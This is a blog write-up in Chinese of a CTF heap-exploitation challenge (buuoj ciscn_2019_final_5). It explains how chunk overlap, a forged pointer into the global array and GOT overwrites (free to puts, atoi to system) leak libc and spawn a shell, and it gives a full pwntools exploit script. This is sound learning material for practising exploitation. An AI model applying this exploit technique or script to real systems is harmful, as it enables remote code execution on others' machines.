[buuoj]ciscn_2019_final_51

最新推荐文章于 2024-11-03 23:32:15 发布
最新推荐文章于 2024-11-03 23:32:15 发布
阅读量117 收藏
点赞数
文章标签: 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42220888/article/details/128657282
版权
该文章详细描述了一个利用64位程序中PartialRelro堆溢出的漏洞进行攻击的过程。首先通过特定的add操作造成堆块重叠,然后通过free和edit的非标准行为修改堆块的size和指针。接着,利用堆块重叠和got表的覆写,泄露puts地址并计算libc基址,最终通过编辑堆块内容触发system调用,实现远程代码执行。
摘要由CSDN通过智能技术生成

exp参考了这位大师傅

题目分析

 64位堆题,Partial Relro

程序功能:

1.add

2.free

3.edit

add函数:

有一个低三位地址(16进制)的泄露,每个堆块的内容和size地址都由一个数组(我在这叫内容数组和size数组)存放。此处的or函数会对content的地址和size进行或运算并存入内容数组里。可以发现这里内容数组存放指针的顺序是按照add的顺序来的。而经过调试,第一个申请的堆的地址往往是0x260,即001001100000和00010000或一下就会变成0x270,这就造成了堆重叠。

 free:

这个free很有意思,和平常的free不同,他不是根据你输入的index去对应的找到相同index的堆,而是找最后一位和index相同的进行free操作。

 

 edit:逻辑和free是一样的,edit的size是根据保存在size数组里的值来确定的。

 题目思路:

  1.先add一个index为0x10的堆块并在内容中布置好堆块的内容就可以实现堆块的重叠。(这里限制index为0x10及以下,所以就0x10有这个性质)

add(0x10,0x10,p64(0)+p64(0x30))
gdb.attach(p)

可以看到内容是被写入到0x24b4260中的,但是内容数组中存放的却是0x24b4270

 

 

 2.接下来我们再创建一个堆并把两个堆都free掉,这时如果我们申请一个0x20的堆就可以将堆块1的size段和fd段进行修改。

add(1,0xc0,b'aaa')

dele(0)
dele(1)
add(2,0x20,p64(0)+p64(0x21)+p64(0x6020e0))

可以看到堆块1指向了0x6020e0

 3.此时我们连续申请两个0xc0大小的堆块(3,4)此时四就会被申请到0x6020e0,这样我们写入的内容就会被存入0x6020e0(内容数组)中,同时因为能写0xe0我们能覆盖size数组(这里0x10应该不是固定的只要能实现got表的覆写就好)。

add(3,0xc0,'dddd')
add(4,0xc0,p64(free_got)+p64(puts_got)+p64(atoi-4)+p64(0)*17+p32(0x10)*8)

可以看到内容数组里以及覆盖为对应的地址了(这里0x6020f0后面不知道为什么没有覆盖成0,不是很懂),这里还有一个有意思的点就是atoi要调整一下偏移,因为前面说过free和edit是以地址最后一位来的,所以这里不减去4就会造成重复,当然减去其他数和加上其他数应该也可以,可以调试着试试。

4.接下来我们将free_got覆盖成put实现地址泄露功能,将puts_got泄露出来算出libc偏移,并在atoi中写入system。edit(8)就是对free_got进行覆写,然后dele(0)就会puts(puts_got)最后就是简单的getshell了。

edit(8,p64(puts_plt)*2)
dele(0)
puts=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc_base = puts - libc.symbols['puts']
system = libc_base + libc.sym['system']
print(hex(puts))
print(hex(system))
edit(4,p64(system)*2)
p.sendline(b'/bin/sh\x00')

 完整exp:

from pwn import *
from LibcSearcher import *
import hashlib
import time
context(os='linux', arch='i386', log_level='debug')
#context(os='linux', arch='amd64', log_level='debug')
elf=ELF('./1')
libc=ELF('./libc.so.6')


mode =0
if mode == 0:
    p = process("./1")
else:
    p = remote("node4.buuoj.cn", 29502)
    #p = remote("47.98.99.193", 6666)






def add(idx,size,content):
	p.sendlineafter('your choice: ','1')
	p.sendlineafter('index: ',str(idx))
	p.sendlineafter('size: ',str(size))
	p.sendafter('content:',content)
	
	
	
def dele(id1):
	p.sendlineafter('your choice: ','2')
	p.sendlineafter('index:',str(id1))	


	
def show():
	p.sendlineafter('Your choice : ','2')
	#p.sendlineafter('Give me your index :',str(id1))	
	
def edit(id1,name):
	p.sendlineafter('your choice: ','3')
	p.sendlineafter('index:',str(id1))	
	p.sendafter('content:',name)


free_got=elf.got['free']
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
atoi=elf.got['atoi']


add(0x10,0x10,p64(0)+p64(0x30))

add(1,0xc0,b'aaa')

dele(0)
dele(1)


add(2,0x20,p64(0)+p64(0x21)+p64(0x6020e0))

add(3,0xc0,'dddd')
add(4,0xc0,p64(free_got)+p64(puts_got)+p64(atoi-4)+p64(0)*17+p32(0x30)*8)
gdb.attach(p)
edit(8,p64(puts_plt)*2)
dele(0)
puts=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc_base = puts - libc.symbols['puts']
system = libc_base + libc.sym['system']
print(hex(puts))
print(hex(system))
edit(4,p64(system)*2)
p.sendline(b'/bin/sh\x00')

#gdb.attach(p)



p.interactive()

小结:本来以为对解堆题开始有点熟悉了,但是遇到一点点变种还是会有点不知所措,说白了还是对各种漏洞用法还是不够熟练,这题的依据地址最后一位索引的机制还是很有意思的,漏洞点也不是那么直白,收获很多!如果有什么地方说的不对也希望大佬们能够指正。

mahj0ng
关注
lesson_test_calculator_final.rar_Final Test
09-19
标题 "lesson_test_calculator_final.rar_Final Test" 暗示我们正在处理一个关于软件开发的项目,特别是针对Symbian V3操作系统的一个最终测试版本。这个简易计算器是使用QT4框架在该平台上构建的,目的是作为新手...
frps_2019_data_final.xls
02-28
2019美国Federal Reserve Payments Study. The study covered general-purpose and private-label credit, debit, and prepaid cards, electronic benefits transfers (EBT) cards, ACH transfers, wire transfers, ...
full_stack_final.zip
08-16
"full_stack_final.zip" 这个压缩包文件的标题暗示了它包含的是一份关于全栈开发的最终项目或学习资料。全栈开发是IT领域中的一个重要概念,它指的是掌握前端和后端技术,能够独立完成整个Web应用程序的开发工作。在...
code-1_touch_switch_final_android_
10-04
【标题】"code-1_touch_switch_final_android_" 指的可能是一个Android应用程序项目,它涉及到使用触摸开关功能。在Android开发中,触摸事件处理是关键部分,允许用户通过触摸屏幕来与应用交互。这个项目可能是一个...
FINAL_OFDM_FINAL_OFDM_
10-01
FINAL_OFDMOFDM(Orthogonal Frequency Division Multiplexing)即正交频分复用技术,实际上OFDM是MCM(Multi Carrier Modulation),多载波调制的一种。通过频分复用实现高速串行数据的并行传输
前端如何安全存储密钥,防止信息泄露
AM1n98的博客
10-30 1287
把公钥写在前端代码文件里被公司检测到了要整改,整理几种常见的前端密钥存储方案。
轻型民用无人驾驶航空器安全操控理论培训知识总结-多旋翼部分
Lizzy_Fly的博客
10-30 949
15.航空器的视觉避障只有在光照等环境条件满足视觉系统工作要求时才能生效,光照条件特别暗或者特别亮的情况下,请谨慎飞行,即使视觉系统正常工作时,也可能无法精准识别高压线,而且高压线还会影响图传和遥控信号,因此不建议在高压线间飞行,如因电力巡检等工作原因必须在此环境下飞行,建议经专门培训后再进行操作;当航空器记录了返航点并且在定位服务良好的情况下,航空器电池电量不足、遥控器与航空器之间失去通讯信号以及图传信号丢失时,将会触发自动返航,操控员也可主动开启自动返航,航空器将自动返回返航点并降落。
Linux系统安全配置
qq_24442273的博客
10-28 999
【代码】Linux系统安全配置。
网站被浏览器提示不安全怎么办?——附解决方案
2403_87921797的博客
10-30 600
首先,确保你的网站使用了有效的SSL证书。使用安全扫描工具来检测潜在的安全问题。记住,网站安全不仅关乎用户体验,也直接影响到网站的搜索排名和信誉。:在解决问题期间,通过社交媒体、电子邮件等方式通知用户你的网站正在进行安全维护,以减少用户的不信任感。:如果你已经解决了安全问题,可以向浏览器提供商提交重新审查的请求,以便他们更新你的网站安全状态。:即使问题得到解决,也需要持续监控网站的安全状态,防止未来再次出现安全问题。:确保你的网站托管服务提供商具有良好的安全记录,能够提供必要的安全支持。
重磅新品丨Fortinet 发布 Lacework FortiCNAPP,强化云原生应用安全
Sophya89的博客
10-30 1011
致力于网络与安全融合的全球网络安全供应商 Fortinet®(纳斯达克代码:FTNT)近日宣布,推出了一款全新人工智能(AI)驱动的统一防护平台——Lacework FortiCNAPP,该平台依托单一供应商优势,全面覆盖从代码安全到云安全的应用程序全生命周期。
如何在Linux系统中使用SSH进行安全连接
qq_36287830的博客
10-30 447
SSH是一个网络协议,用于计算机之间的安全登录以及命令执行,此外还允许进行安全的数据传输。通过本文,你已经学习了如何在Linux系统中使用SSH进行安全连接。我们介绍了SSH的基本概念、安装方法、启动SSH服务、验证安装、SSH配置、SSH客户端、SSH密钥认证、使用SSH隧道、SSH端口转发、使用SSH代理、SSH环境变量、SSH日志、SSH守护进程选项、使用SSH密钥管理工具、使用SSH证书、使用SSH网关、SSH的高级特性等内容。
ICT网络赛道安全考点知识总结3
最新发布
m0_72765822的博客
11-03 256
关于SSL VPN的特点的描述如下: 由于SSL VPN登录方式借助了浏览器,所以实现了客户端的自动安装和配置,这样用户可以随时随地用设备快捷登录,同时也缓解了网络管理员维护客户端等方面的压力。 SSL VPN针对内网资源可以解析到应用层,并精细化地发布应用。 SSL VPN可以深层次地访问内网资源并精细控制应用访问。 SSL VPN能支持各种IP应用。 SSL VPN通常可以支持多种认证方式,并且可以与现有身份认证系统集成,以提供更灵活的身份验证选项。 入侵防御特征库通常包含预定义签名,这些签名
DAY66WEB 攻防-Java 安全&SPEL 表达式&SSTI 模版注入&XXE&JDBC&MyBatis 注入
m0_74402888的博客
10-30 1054
XXE ( XML External Entity Injection ), XML外部实体注入,当开发人员配置其XML解析功能允许外部实体引用时,攻击者可利用这一可引发安全问题的配置方式,实施任意文件读取、内网端口探测、命令执行、拒绝服务等攻击。SSTI(Server Side Template Injection) 服务器模板注入, 服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容。XML使用标签来描述数据的结构和含义。
国家级汽车检测中心联合开源网安打造安全解决方案,提升行业安全检测水平
weixin_55163056的博客
10-31 416
通过开源网安提供的全面漏洞检测和精准安全评估,该检测中心能够及时发现智能网联汽车系统中的安全漏洞和潜在风险,降低因信息安全问题导致的车辆故障和事故风险,也为智能网联汽车行业提供了可靠的安全检测手段,有助于推动行业制定更高的安全标准,增强用户对智能网联汽车的信任,促进了产业健康发展。开源网安为该检测中心提供了智能网联汽车安全检测平台和模糊测试平台,对智能网联汽车各系统进行深入检测,涵盖关键零部件和整车相关部分,运用模糊测试技术发现潜在安全漏洞,确保车辆面对网络威胁时的安全
安全性分析】正式安全分析与非正式安全分析
JingYan_Chan的博客
10-31 870
为实现网络的安全目标,通常需要提出相关认证密钥协议(Authentication and Key Agreement Protocol, AKA)对网络通信进行保护。若设计的协议中出现安全漏洞,将导致网络容易收到安全攻击。所以我们需要对提出的协议进行安全性分析。安全性分析正式安全分析非正式安全分析。本章总结了安全性分析的两大类,接下来,我将详细介绍每一种安全性分析方法的详细分析过程。
Windows 安全日志解析
qq_38933606的博客
10-29 813
当Windows运行一个计划任务时,“计划任务服务”将为这个任务首先创建一个新的登录会话以便它能在此计划任务所配置的用户账户下运行,当这种登录出现时,Windows在日志中记为类型4。与计划任务类似,每种服务都被配置在某个特定的用户账户下运行,当一个服务开始时,Windows首先为这个特定的用户创建一个登录会话,这将被记为类型5。当离线设备使用域用户登录时,Windows将使用缓存的交互式域登录的凭证HASH来验证你的身份,这种情况下将登录记为类型11。不详,推测与类型11类似,适用于远程桌面的离线登录。
提高交换网络可靠性之端口安全配置
m0_53649704的博客
11-03 214
7.laptop0 ping PC0,不通,且端口直接自动关闭了。此实验为配置交换机端口安全,当非法设备接入接口时自动触发安全措施。6,添加一台PC机,按照图中要求配置ip地址。2.交换机改名为S1,同时启用端口安全。4.设置违规处理方式:即违规则关闭端口。1.查看PC1和PC2的MAC地址👇。5.查看安全端口相关信息。3.配置允许接入设备。
安全运营 -- 监控linux命令history
leeezp的博客
10-27 986
最近,有个IT的同事给我提了一个需求,说想监控/root/.ssh/ 文件夹下的文件变动,于是我灵机一动......
【简道云 -注册/登录安全分析报告】
10-30 1128
帆软软件有限公司(以下简称“帆软”)成立于2006年,是中国专业的大数据BI和分析平台提供商,专注商业智能和数据分析领域,致力于为全球企业提供一站式商业智能解决方案。帆软在专业水准、组织规模、服务范围、企业客户数量上均为业内前列,先后获得包括Gartner、IDC、CCID在内的众多专业咨询机构的认可。2023年销售额超14.6亿,2018年-2023年,连续多年入选中国大数据企业50强,连续多年中国BI市场占有率第一。
智能水处理:Power_Wastewater_final的全面解决方案与高效节能技术
Power_Wastewater_final是一份专注于智能电力解决方案的文档,特别针对废水处理应用领域。该资源强调了Rockwell Automation在水处理和废水管理行业的专业知识与悠久历史,其产品和服务以其高质量和可靠性能而闻名,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值